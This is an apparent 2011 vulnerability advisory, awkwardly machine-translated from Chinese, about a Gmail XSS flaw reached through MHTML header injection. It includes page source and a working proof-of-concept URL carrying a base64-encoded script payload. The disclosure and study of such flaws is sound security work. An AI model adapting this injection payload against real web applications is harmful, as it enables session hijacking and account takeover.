Gmail Xss vulnerability can cause the user to be hijacking-vulnerability warning-the black bar safety net

2011-03-05T00:00:00
ID MYHACK58:62201129620
Type myhack58
Reporter 佚名
Modified 2011-03-05T00:00:00

Description

Brief description:

Google recently quietly fix the Gmail there is a seriousxssproblems that may lead to hijacking of user accounts Detailed description: <! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="zh-Hans">

<head>

<script type="text/javascript">serverResponseTimeDelta=window. external&&window. external. pageT? window. external. pageT:-1;pageStartTime=new Date(). getTime();</script>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>contact us - Gmail help</title>

<meta name="google-site-verification"

content="l0nCskQHeO/C11y6qeq7ngDGZ0QVdN1hX7F4SGj3PHg=" />

<link rel="icon" href="//www.google.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://mail.google.com/support/bin/resource/all.css?v=261_7" />

<script type="text/javascript">

var internal = 0;

var hc_protocol = "http://";

var hc_page_info = "request";

var country = 'CN';

var countryGroup = 'JAPAC';

var autoExpand = ";

var global_error_general = "sorry, we are unable to submit your information. Please try again.";

var hc_urchin = "UA-1 8 5 0 0-2 8";

var global_hc_bookmark = new Array("add","remove","toggle");

global_hc_bookmark. add = new Array();

global_hc_bookmark. remove = new Array();

global_hc_bookmark. toggle = new Array();

global_hc_bookmark["add"]. url = "";

The problem exists in

var hc_page_info = "request";

Controllable, to meet the mhtml vulnerability of the Use Conditions http://mail.google.com/support/bin/request.py?contact_type=contact_policy%0dContent-Type%3Amultipart/related%3Bboundary%3Dx--x%0DContent-Location%3Ax%0DContent-Transfer-Encoding%3Abase64%0d%0dPHNjcmlwdD5hbGVydCgnZ21haWwgMGRheSB0ZXN0IGJ5ID8/PycpPC9zY3JpcHQ%2B%--x! x

The successful implementation of javascript, you can of the gmail mailbox to perform any operation, prior to already have the corresponding number of case disclosures http://www.wooyun.org/bugs/wooyun-2010-01199

< Vulnerability response Vendor response:

Failure to contact the vendors or manufacturers actively refused it